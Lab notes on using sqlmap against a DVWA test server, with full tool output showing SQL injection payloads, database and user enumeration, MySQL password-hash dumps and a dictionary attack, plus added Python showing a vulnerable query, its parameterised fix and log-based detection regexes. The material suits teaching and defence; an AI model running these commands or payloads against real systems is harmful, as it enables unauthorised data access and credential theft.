sql injection – sqlmap


sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

https://github.com/sqlmapproject/sqlmap/wiki/Usage

Typical usage

Using a web proxy such as Burp, identify the vulnerable parameter, then copy the full HTTP request into a file. Open the file and place a * in the value of the vulnerable parameter; the * tells sqlmap to test that position for injection.

sqlmap -r request.txt 

(This starts sqlmap. It asks whether you want to test the parameter marked with *; reply Y for yes. It then commonly asks whether to follow a redirect; reply N for no. sqlmap then runs.)

If you know the SQL vendor you can force sqlmap to test only for that DBMS flavour.

sqlmap -r request.txt --dbms=mysql

Once sqlmap confirms the parameter is vulnerable you can press Ctrl+C and then e to end the detection phase. It then completes and reports the DBMS version and operating system.

Common commands afterwards

sqlmap -r request.txt --dbs (enumerates the databases)

sqlmap -r request.txt -D database-name --tables

sqlmap -r request.txt -D database-name -T table-name --dump
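As an added example that is not part of the original post, the following Python script reproduces the boolean-based blind check that sqlmap's detection phase performs, once against a string-concatenated query (the DVWA "low" pattern) and once against a parameterised one. It uses an in-memory SQLite table; the table, its rows and the function names are my own constructions and stand in for the MySQL dvwa.users table seen later on the page.

```python
import sqlite3

# Constructed sample table modelled on the dvwa.users columns shown later on the page.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "admin"), (2, "Gordon", "Brown")])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    # DVWA 'low' pattern: the untrusted parameter is pasted into the SQL text,
    # so a quote in the value closes the literal and the remainder runs as SQL.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    # Hardened form: the value is bound as a parameter and can never alter the query.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()

# The payload pair sqlmap reported for the boolean-based blind technique (values from the page).
TRUE_PAYLOAD = "1' AND 8761=8761 AND 'FczA'='FczA"
FALSE_PAYLOAD = "1' AND 8761=8762 AND 'FczA'='FczA"

def boolean_differential(conn: sqlite3.Connection, query_fn) -> bool:
    """Mimic sqlmap's boolean-based blind check: the parameter is injectable when a
    TRUE condition reproduces the baseline response and a FALSE condition changes it."""
    baseline = query_fn(conn, "1")
    true_resp = query_fn(conn, TRUE_PAYLOAD)
    false_resp = query_fn(conn, FALSE_PAYLOAD)
    return baseline == true_resp and baseline != false_resp

if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable:", boolean_differential(db, lookup_vulnerable))  # True
    print("parameterised query injectable:", boolean_differential(db, lookup_safe))      # False
```

With the bound parameter the whole payload string is compared against the integer column as one opaque value, so both the TRUE and FALSE probes return no rows and there is no differential for the detection engine to key on.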

BackTrack 5 R1

/pentest/database/sqlmap

To find SQL database version
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url

To find SQL database names
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dbs

To find database table names
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --tables -D database-name

To find database columns
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --columns -T table-name -D database-name

To see the data from the database
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dump --columns -T table-name -D database-name

Grab the session cookie from the TamperData Firefox plugin

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 17:05:51

[17:05:52] [INFO] using '/pentest/database/sqlmap/output/IP-Address/session' as session file
[17:05:52] [INFO] resuming injection data from session file
[17:05:52] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[17:05:52] [INFO] testing connection to the target url
[17:05:52] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8761=8761 AND 'FczA'='FczA&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 45 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,118,105,58),(SELECT (CASE WHEN (45=45) THEN 1 ELSE 0 END)),CHAR(58,113,98,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'COXA'='COXA&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,106,118,105,58),IFNULL(CAST(CHAR(117,73,80,113,73,74,111,75,85,72) AS CHAR),CHAR(32)),CHAR(58,113,98,100,58))# AND 'kmcR'='kmcR&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'qxrK'='qxrK&Submit=Submit

[17:05:52] [INFO] manual usage of GET payloads requires url encoding
[17:05:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[17:05:52] [INFO] fetching database names
[17:05:52] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, cdcol,  mysql, performance_schema, phpmyadmin, test, webauth
available databases [8]:
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

[17:05:52] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/IP-Address'
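For the defending side, here is an added example (mine, not part of the original post or of sqlmap) that turns the four payload shapes sqlmap listed above into signatures and runs them over web-server access log lines. The log lines, IP addresses and regular expressions are constructed for the example; the User-Agent check assumes the tester did not override sqlmap's default "sqlmap/<version>" agent.

```python
import re
from urllib.parse import unquote_plus

# One signature per technique sqlmap reported above; shapes derived from those payloads.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"FLOOR\(RAND\(|INFORMATION_SCHEMA|CONCAT\(CHAR\(", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(", re.I),
}

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def classify(line: str) -> list:
    """Return the techniques detected in one log line (empty list when clean).
    The request path is URL-decoded first, because the payloads travel encoded."""
    m = LOG_RE.match(line)
    if not m:
        return []
    decoded = unquote_plus(m.group("path"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    # sqlmap announces itself in the User-Agent unless the tester overrode it (assumed not here).
    if m.group("ua").lower().startswith("sqlmap/"):
        hits.append("sqlmap user-agent")
    return hits

def scan(lines) -> list:
    """Return (source ip, techniques) for every line that matched at least one signature."""
    findings = []
    for line in lines:
        hits = classify(line)
        if hits:
            findings.append((LOG_RE.match(line).group("ip"), hits))
    return findings

# Constructed sample log: one ordinary request, then one request per technique.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2012:10:14:04 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2012:10:14:05 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%208761%3D8761%20AND%20%27FczA%27%3D%27FczA&Submit=Submit HTTP/1.1" 200 4321 "-" "sqlmap/1.0-dev (r4009)"',
    '10.0.0.9 - - [12/Mar/2012:10:14:06 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23&Submit=Submit HTTP/1.1" 200 4402 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2012:10:14:12 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%20SLEEP%285%29%20AND%20%27qxrK%27%3D%27qxrK&Submit=Submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2012:10:14:13 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%20AND%20%28SELECT%2045%20FROM%28SELECT%20COUNT%28%2A%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&Submit=Submit HTTP/1.1" 500 812 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```

Note that only the first probe is caught by the User-Agent check; the other three are identified purely by the decoded query string, which is the detection that still works when the agent string has been randomised.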

./sqlmap.py -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --users --passwords

dojo@dojo-vm:~/tools/sqlmap$ ./sqlmap.py -u 'http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit' --dbs --users --passwords

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:07:20

[11:07:20] [INFO] using '/home/dojo/tools/sqlmap/output/127.0.0.1/session' as session file
[11:07:20] [INFO] resuming string match 'Surname' from session file
you did not provide any string to match. Do you want to use the resumed string to be matched in page when the query is valid? [Y/n]
[11:07:21] [INFO] resuming injection point 'GET' from session file
[11:07:21] [INFO] resuming injection parameter 'id' from session file
[11:07:21] [INFO] resuming injection type 'stringsingle' from session file
[11:07:21] [INFO] resuming 0 number of parenthesis from session file
[11:07:21] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:07:21] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ../../login.php - What target address do you want to use from now on? http://127.0.0.1:80/dvwa/vulnerabilities/sqli/ (default) or provide another target address based also on the redirection got from the application

>
[11:07:22] [INFO] testing for parenthesis on injectable parameter
[11:07:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[11:07:22] [INFO] fetching database users
[11:07:22] [INFO] fetching number of database users
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'localhost'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'dojo-vm'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'127.0.0.1'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[11:07:22] [INFO] fetching database users password hashes
[11:07:22] [INFO] fetching number of password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[11:07:22] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

[11:07:22] [INFO] fetching database names
[11:07:22] [INFO] fetching number of databases
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': information_schema
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': dvwa
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': mysql
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[11:07:22] [INFO] Fetched data logged to text files under '/home/dojo/tools/sqlmap/output/127.0.0.1'

[*] shutting down at: 11:07:22

dojo@dojo-vm:~/tools/sqlmap$

--------------------------------------------------------------
updates
--------------------------------------------------------------
Find database

Used the TamperData Firefox plugin to get the cookie, as below

Cookie=security=low; _session_id=f4cd3cc878720ceedcc985be580901d4; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3

Reload the login page to get a clean URL: /dvwa/vulnerabilities/sqli/?id=&Submit=Submit#

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" --dbs --users --passwords

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:14:04

[10:14:04] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:14:04] [INFO] resuming injection data from session file
[10:14:04] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:14:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:14:04] [INFO] manual usage of GET payloads requires url encoding
[10:14:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:14:04] [INFO] fetching database users
[10:14:04] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 
'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:14:05] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[10:14:10] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:14:16] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[10:14:22] [INFO] starting dictionary attack (mysql_passwd)
[10:14:24] [WARNING] no clear password(s) found
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302
[*] root [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302

[10:14:24] [INFO] fetching database names
[10:14:24] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[10:14:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:14:24

--------------------------------------------------------------
Find tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:27:40

[10:27:40] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:27:40] [INFO] resuming injection data from session file
[10:27:40] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:27:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:27:40] [INFO] manual usage of GET payloads requires url encoding
[10:27:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:27:40] [INFO] fetching tables for database: dvwa
[10:27:40] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+

[10:27:40] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:27:40

--------------------------------------------------------------
Find users

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --users

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:28:45

[10:28:45] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:28:45] [INFO] resuming injection data from session file
[10:28:45] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:28:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:28:45] [INFO] manual usage of GET payloads requires url encoding
[10:28:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:28:45] [INFO] fetching database users
[10:28:45] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 
'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:28:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:28:45

--------------------------------------------------------------
Find passwords

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa -T users -C password --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:24:19

[10:24:20] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:24:20] [INFO] resuming injection data from session file
[10:24:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:24:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:24:20] [INFO] manual usage of GET payloads requires url encoding
[10:24:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
